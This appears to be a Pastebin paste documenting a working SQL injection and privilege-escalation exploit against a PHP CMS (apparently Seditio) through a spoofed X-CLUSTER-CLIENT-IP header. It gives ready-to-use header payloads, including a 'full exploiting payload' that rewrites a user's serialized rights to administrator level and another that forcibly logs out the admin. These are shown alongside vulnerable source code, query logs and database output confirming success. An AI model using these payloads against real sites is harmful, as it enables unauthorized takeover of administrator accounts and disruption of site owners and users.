Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $cfg['clustermode'] = ADMIN PANEL checkbox YES and value true :)
- $usr['ip'] = ($cfg['clustermode']) ? $_SERVER['HTTP_X_CLUSTER_CLIENT_IP'] : $_SERVER['REMOTE_ADDR'] ;
- NOT VALIDATE and SANITIZE
- SQL Injection :)
- sed_sql_query("UPDATE $db_users SET user_lastip='".$usr['ip']."' WHERE user_id='".$row['user_id']."' LIMIT 1");
- Authentication page (Header)
- X-CLUSTER-CLIENT-IP: 127.0.0.1' or 1='1
- QUERY SNIP____
- MariaDB [sed]> UPDATE sed_users SET user_lastip='127.0.0.1' or 1=1 WHERE user_id=1;
- /*BLIND SQL*/
- +-------------+-----------+
- | user_lastip | user_name |
- +-------------+-----------+
- | 1 | admin |
- +-------------+-----------+
- 1 row in set (0.00 sec)
- MariaDB [sed]> select user_lastip,user_name from sed_users;
- +-------------+-----------+
- | user_lastip | user_name |
- +-------------+-----------+
- | 1 | admin |
- +-------------+-----------+
- 1 row in set (0.00 sec)
- second vector
- MariaDB [sed]> select user_lastip,user_name from sed_users where user_id=1;
- +------------------+-----------+
- | user_lastip | user_name |
- +------------------+-----------+
- | 5.5.30-MariaDB-m | admin |
- +------------------+-----------+
- 1 row in set (0.00 sec)
- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- and privileges Escaltion :P
- MariaDB [sed]> select * from sed_auth where auth_code='admin';
- +---------+--------------+-----------+-------------+-------------+------------------+------------------+
- | auth_id | auth_groupid | auth_code | auth_option | auth_rights | auth_rights_lock | auth_setbyuserid |
- +---------+--------------+-----------+-------------+-------------+------------------+------------------+
- | 1 | 1 | admin | a | 0 | 255 | 1 |
- | 2 | 2 | admin | a | 0 | 255 | 1 |
- | 3 | 3 | admin | a | 0 | 255 | 1 |
- | 4 | 4 | admin | a | 0 | 255 | 1 |
- | 5 | 5 | admin | a | 255 | 255 | 1 |
- | 76 | 6 | admin | a | 1 | 0 | 1 |
- +---------+--------------+-----------+-------------+-------------+------------------+------------------+
- 6 rows in set (0.01 sec) = > privileges selection
- MariaDB [sed]> select auth_groupid,auth_rights from sed_auth where auth_code='admin';
- +--------------+-------------+
- | auth_groupid | auth_rights |
- +--------------+-------------+
- | 1 | 0 |
- | 2 | 0 |
- | 3 | 0 |
- | 4 | 0 |
- | 5 | 255 |
- | 6 | 1 |
- +--------------+-------------+
- 6 rows in set (0.20 sec)
- = > administrator group int(5)
- administrator rights = > 255 (admin panel keys :D)
- MariaDB [sed]> select grp_id,grp_alias from sed_groups;
- +--------+----------------+
- | grp_id | grp_alias |
- +--------+----------------+
- | 1 | guests |
- | 2 | inactive |
- | 3 | banned |
- | 4 | members |
- | 5 | administrators |
- | 6 | moderators |
- +--------+----------------+
- 6 rows in set (0.02 sec)
- members request output serialize() call
- /*
- a:13:{s:5:"admin";a:1:{s:1:"a";i:0;}s:8:"comments";a:1:{s:1:"a";i:3;}s:6:"forums";a:2:{i:1;i:3;i:2;i:3;}s:7:"gallery";a:1:{s:1:"a";i:1;}s:5:"index";a:1:{s:1:"a";i:1;}s:7:"message";a:1:{s:1:"a";i:1;}s:4:"page";a:4:{s:8:"articles";i:3;s:4:"news";i:3;s:7:"sample1";i:3;s:7:"sample2";i:3;}s:3:"pfs";a:1:{s:1:"a";i:3;}s:4:"plug";a:13:{s:7:"adminqv";i:1;s:7:"cleaner";i:1;s:7:"contact";i:3;s:14:"massmovetopics";i:0;s:4:"news";i:1;s:11:"passrecover";i:1;s:11:"recentitems";i:1;s:6:"search";i:1;s:10:"skineditor";i:3;s:10:"statistics";i:1;s:8:"syscheck";i:3;s:7:"tinymce";i:1;s:10:"whosonline";i:1;}s:2:"pm";a:1:{s:1:"a";i:3;}s:5:"polls";a:1:{s:1:"a";i:3;}s:7:"ratings";a:1:{s:1:"a";i:3;}s:5:"users";a:1:{s:1:"a";i:3;}}
- members "admin";a:1:{s:1:"a";i:0;}
- key (admin) value (a) = > int("0") - (member rights)
- MariaDB [sed]> select auth_groupid,auth_rights from sed_auth where auth_code='admin' and auth_groupid=4;
- +--------------+-------------+
- | auth_groupid | auth_rights |
- +--------------+-------------+
- | 4 | 0 |
- +--------------+-------------+
- */
- if (empty($row['user_auth']))
- {
- $usr['auth'] = sed_auth_build($usr['id'], $usr['maingrp']);
- $sys['sql_update_auth'] = ", user_auth='".serialize($usr['auth'])."'";
- }
- administrator request :)
- and output result
- /* output result
- a:13:{s:5:"admin";a:1:{s:1:"a";i:255;}s:8:"comments";a:1:{s:1:"a";i:255;}s:6:"forums";a:2:{i:1;i:255;i:2;i:255;}s:7:"gallery";a:1:{s:1:"a";i:255;}s:5:"index";a:1:{s:1:"a";i:255;}s:7:"message";a:1:{s:1:"a";i:255;}s:4:"page";a:4:{s:8:"articles";i:255;s:4:"news";i:255;s:7:"sample1";i:255;s:7:"sample2";i:255;}s:3:"pfs";a:1:{s:1:"a";i:255;}s:4:"plug";a:13:{s:7:"adminqv";i:255;s:7:"cleaner";i:255;s:7:"contact";i:255;s:14:"massmovetopics";i:255;s:4:"news";i:255;s:11:"passrecover";i:255;s:11:"recentitems";i:255;s:6:"search";i:255;s:10:"skineditor";i:255;s:10:"statistics";i:255;s:8:"syscheck";i:255;s:7:"tinymce";i:255;s:10:"whosonline";i:255;}s:2:"pm";a:1:{s:1:"a";i:255;}s:5:"polls";a:1:{s:1:"a";i:255;}s:7:"ratings";a:1:{s:1:"a";i:255;}s:5:"users";a:1:{s:1:"a";i:255;}}
- +++++++++++++++++++++++++++++++++++
- admin "admin";a:1:{s:1:"a";i:255;}
- key (admin) value (a) = > int("0") - (member rights)
- MariaDB [sed]> select auth_groupid,auth_rights from sed_auth where auth_code='admin' and auth_groupid=5;
- +--------------+-------------+
- | auth_groupid | auth_rights |
- +--------------+-------------+
- | 5 | 255 |
- +--------------+-------------+
- */
- =========================================================
- function sed_auth_build($userid, $maingrp=0)
- {
- global $db_auth, $db_groups_users;
- $groups = array();
- $authgrid = array();
- $tmpgrid = array();
- if ($userid==0 || $maingrp==0)
- {
- $groups[] = 1;
- }
- else
- {
- $groups[] = $maingrp;
- $sql = sed_sql_query("SELECT gru_groupid FROM $db_groups_users WHERE gru_userid='$userid'");
- while ($row = sed_sql_fetchassoc($sql))
- { $groups[] = $row['gru_groupid']; }
- }
- $sql_groups = implode(',', $groups);
- $sql = sed_sql_query("SELECT auth_code, auth_option, auth_rights FROM $db_auth WHERE auth_groupid IN (".$sql_groups.") ORDER BY auth_code ASC, auth_option ASC");
- while ($row = sed_sql_fetchassoc($sql))
- { $authgrid[$row['auth_code']][$row['auth_option']] |= $row['auth_rights']; }
- return($authgrid); }
- //update priviliges
- $sql = sed_sql_query("UPDATE $db_users SET user_lastlog='".$sys['now_offset']."', user_lastip='".$usr['ip']."', user_sid='".$usr['sessionid']."', user_logcount=user_logcount+1 ".$sys['sql_update_lastvisit']." ".$sys['sql_update_auth']." WHERE user_id='".$usr['id']."'");
- Evaluation of the rights admin.
- $di=unserialize($usr['auth']);
- echo $di['admin']['a']; //output 255 :) then the verification :P
- Priviliges escaltion exploitation
- problem banlist section :)
- $usr['ip']="127.0.0.1'or 1=1--";
- $userip = explode('.', $usr['ip']);
- $ipmasks = "('".$userip[0].".".$userip[1].".".$userip[2].".".$userip[3]."','".$userip[0].".".$userip[1].".".$userip[2].".*','".$userip[0].".".$userip[1].".*.*','".$userip[0].".*.*.*')";
- var_dump($userip);
- IPv4#Addressing 127.0.0.1'or 1=1--
- echo $usrip[3]; //output result
- IN(127.0.0.1') or usr_auth='blah'-- -)
- nooo syntax :)
- second query (Update statement)
- 130516 21:25:52 66 Query UPDATE sed_users SET user_lastlog='1368721491', user_lastip='12.3.44.4.4') or usr_auth='blah' -- -
- true syntax? = nono :)
- 4 th key :)
- $usr['ip']="127.0.0.1.4'or 1=1-- -";
- var_dump($usr['ip']); //output 4'or 1=1-- -
- 4 th key not used
- me login: administrator
- MariaDB [sed]> select user_auth from sed_users where user_name='administrator'\G
- *************************** 1. row ***************************
- user_auth: a:13:{s:5:"admin";a:1:{s:1:"a";i:0;}s:8:"comments";a:1:{s:1:"a";i:3;}s:6:"forums";a:2:{i:1;i:3;i:2;i:3;}s:7:"gallery";a:1:{s:1:"a";i:1;}s:5:"index";a:1:{s:1:"a";i:1;}s:7:"message";a:1:{s:1:"a";i:1;}s:4:"page";a:4:{s:8:"articles";i:3;s:4:"news";i:3;s:7:"sample1";i:3;s:7:"sample2";i:3;}s:3:"pfs";a:1:{s:1:"a";i:3;}s:4:"plug";a:13:{s:7:"adminqv";i:1;s:7:"cleaner";i:1;s:7:"contact";i:3;s:14:"massmovetopics";i:0;s:4:"news";i:1;s:11:"passrecover";i:1;s:11:"recentitems";i:1;s:6:"search";i:1;s:10:"skineditor";i:3;s:10:"statistics";i:1;s:8:"syscheck";i:3;s:7:"tinymce";i:1;s:10:"whosonline";i:1;}s:2:"pm";a:1:{s:1:"a";i:3;}s:5:"polls";a:1:{s:1:"a";i:3;}s:7:"ratings";a:1:{s:1:"a";i:3;}s:5:"users";a:1:{s:1:"a";i:3;}}
- 1 row in set (0.44 sec)
- (admin) key (a) value => "0" no perm :D
- change perm via sql injection (Priviliges escaltion)
- No Cookie option
- if ($cfg['authmode']==2 || $cfg['authmode']==3)
- { session_start(); }
- if (isset($_SESSION['rsedition']) && ($cfg['authmode']==2 || $cfg['authmode']==3))
- {
- $rsedition = $_SESSION['rsedition'];
- $rseditiop = $_SESSION['rseditiop'];
- $rseditios = $_SESSION['rseditios'];
- }
- elseif (isset($_COOKIE['SEDITIO']) && ($cfg['authmode']==1 || $cfg['authmode']==3))
- {
- $u = base64_decode($_COOKIE['SEDITIO']);
- $u = explode(':_:',$u);
- $rsedition = sed_import($u[0],'D','INT');
- $rseditiop = sed_import($u[1],'D','H32');
- $rseditios = sed_import($u[2],'D','ALP');
- }
- if ($rsedition>0 && $cfg['authmode']>0)
- {
- if (mb_strlen($rseditiop)!=32)
- { sed_diefatal('Wrong value for the password.'); }
- if ($cfg['ipcheck'])
- { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop' AND user_lastip='".$usr['ip']."'"); }
- else
- { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop'"); }
- if ($row = sed_sql_fetcharray($sql))
- {
- if ($row['user_maingrp']>3)
- {
- $usr['id'] = $row['user_id'];
- $usr['sessionid'] = ($cfg['authmode']==1) ? md5($row['user_lastvisit']) : session_id();
- $usr['name'] = $row['user_name'];
- $usr['maingrp'] = $row['user_maingrp'];
- $usr['lastvisit'] = $row['user_lastvisit'];
- $usr['lastlog'] = $row['user_lastlog'];
- $usr['timezone'] = $row['user_timezone'];
- $usr['skin'] = ($cfg['forcedefaultskin']) ? $cfg['defaultskin'] : $row['user_skin'];
- $usr['lang'] = ($cfg['forcedefaultlang']) ? $cfg['defaultlang'] : $row['user_lang'];
- $usr['newpm'] = $row['user_newpm'];
- $usr['auth'] = unserialize($row['user_auth']);
- $usr['level'] = $sed_groups[$usr['maingrp']]['level'];
- $usr['profile'] = $row;
- if ($usr['lastlog']+$cfg['timedout'] < $sys['now_offset'])
- {
- $sys['comingback']= TRUE;
- $usr['lastvisit'] = $usr['lastlog'];
- $sys['sql_update_lastvisit'] = ", user_lastvisit='".$usr['lastvisit']."'";
- }
- if (empty($row['user_auth']))
- {
- $usr['auth'] = sed_auth_build($usr['id'], $usr['maingrp']);
- $sys['sql_update_auth'] = ", user_auth='".serialize($usr['auth'])."'";
- }
- // $sql = sed_sql_query("UPDATE $db_users SET user_lastlog='".$sys['now_offset']."', user_lastip='".$usr['ip']."', user_sid='".$usr['sessionid']."', user_logcount=user_logcount+1 ".$sys['sql_update_lastvisit']." ".$sys['sql_update_auth']." WHERE user_id='".$usr['id']."'");
- }
- }
- }
- Cookie header send
- Cookie: PHPSESSID=blablablasessionidrseditionandauthmode
- if true :/ (if ($rsedition>0 && $cfg['authmode']>0));
- if ($rsedition>0 && $cfg['authmode']>0)
- {
- if (mb_strlen($rseditiop)!=32)
- { sed_diefatal('Wrong value for the password.'); }
- if ($cfg['ipcheck'])
- { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop' AND user_lastip='".$usr['ip']."'"); }
- else
- { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop'"); }
- file: config.php
- section: $cfg['ipcheck']=true;
- fail syntax
- $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop' AND user_lastip='".$usr['ip']."'");
- my vector and fail syntax
- 127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -
- full snip query
- +++++++++++++++++++++++++++++++++++++
- SELECT * FROM $db_users WHERE user_id='3 AND user_password='blah' AND user_lastip='127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -'
- Failure syntax :(
- LOGIN PAGE REQUEST (HTTP HEADER)
- X-CLUSTER-CLIENT-IP: 127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -
- http://s18.postimg.org/xcjy55mkp/fullquery.png
- return false if the cookie option is empty
- /*
- if ($rsedition>0 && $cfg['authmode']>0) // output result false :) (no cookie option)
- */
- after the introduction mysql query log :)
- 326 Query SELECT user_id, user_maingrp, user_banexpire, user_skin, user_lang FROM sed_users WHERE user_password='3e1f0522ece29f7be6f69cd3bfb2d9a8' AND user_name='admin'
- 326 Query UPDATE sed_users SET user_lastip='127.0.0.1.4',user_auth='getsikdir!!!!!!!!!!!!!!!!!!' WHERE user_id=3 -- -' WHERE user_id='1' LIMIT 1
- 326 Query DELETE FROM sed_online WHERE online_userid='-1' AND online_ip='127.0.0.1.4',user_auth='getsikdir!!!!!!!!!!!!!!!!!!' WHERE user_id=3 -- -' LIMIT 1
- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- AFTER
- Full exploiting payload
- 127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -
- MariaDB [sed]> select user_auth from sed_users where user_name='administrator'\G*************************** 1. row ***************************
- user_auth: a:13:{s:5:"admin";a:1:{s:1:"a";i:255;}s:8:"comments";a:1:{s:1:"a";i:3;}s:6:"forums";a:2:{i:1;i:3;i:2;i:3;}s:7:"gallery";a:1:{s:1:"a";i:1;}s:5:"index";a:1:{s:1:"a";i:1;}s:7:"message";a:1:{s:1:"a";i:1;}s:4:"page";a:4:{s:8:"articles";i:3;s:4:"news";i:3;s:7:"sample1";i:3;s:7:"sample2";i:3;}s:3:"pfs";a:1:{s:1:"a";i:3;}s:4:"plug";a:13:{s:7:"adminqv";i:1;s:7:"cleaner";i:1;s:7:"contact";i:3;s:14:"massmovetopics";i:0;s:4:"news";i:1;s:11:"passrecover";i:1;s:11:"recentitems";i:1;s:6:"search";i:1;s:10:"skineditor";i:3;s:10:"statistics";i:1;s:8:"syscheck";i:3;s:7:"tinymce";i:1;s:10:"whosonline";i:1;}s:2:"pm";a:1:{s:1:"a";i:3;}s:5:"polls";a:1:{s:1:"a";i:3;}s:7:"ratings";a:1:{s:1:"a";i:3;}s:5:"users";a:1:{s:1:"a";i:3;}}
- 1 row in set (0.00 sec)
- "admin";a:1:{s:1:"a";i:255;}
- value = > "255" WTF ? :D ??
- ADMIN PANEL :D
- http://s22.postimg.org/whujo6xu9/lol.png
- ==============================================================
- Unauthorized user *logout*
- MariaDB [sed]> select online_ip,online_name from sed_online;
- +-----------+-------------+
- | online_ip | online_name |
- +-----------+-------------+
- | 127.0.0.1 | admin |
- | 128.0.0.2 | user |
- +-----------+-------------+
- 2 row in set (0.00 sec)
- me login => user :)
- Logout page request (HEADER) = > logout.php
- X-CLUSTER-CLIENT-IP: 127.0.0.1
- if ($usr['id']>0)
- {
- $sql = sed_sql_query("DELETE FROM $db_online WHERE online_ip='".$usr['ip']."'");
- sed_redirect("message.php?msg=".$usr['ip']);
- exit;
- }
- echo $usr['ip'] => Output 127.0.0.1222233' or online_name='admin' (Spoof X IP)-(Administrator IP :D) :)
- QUERY EXEC - > $sql = sed_sql_query("DELETE FROM $db_online WHERE online_ip='127.0.0.1222233' or online_name='admin'");
- ???? profit = administrator panic :D
- my favorit :) http://www.youtube.com/watch?v=ruFt9ZvBnvo
Add Comment
Please, Sign In to add comment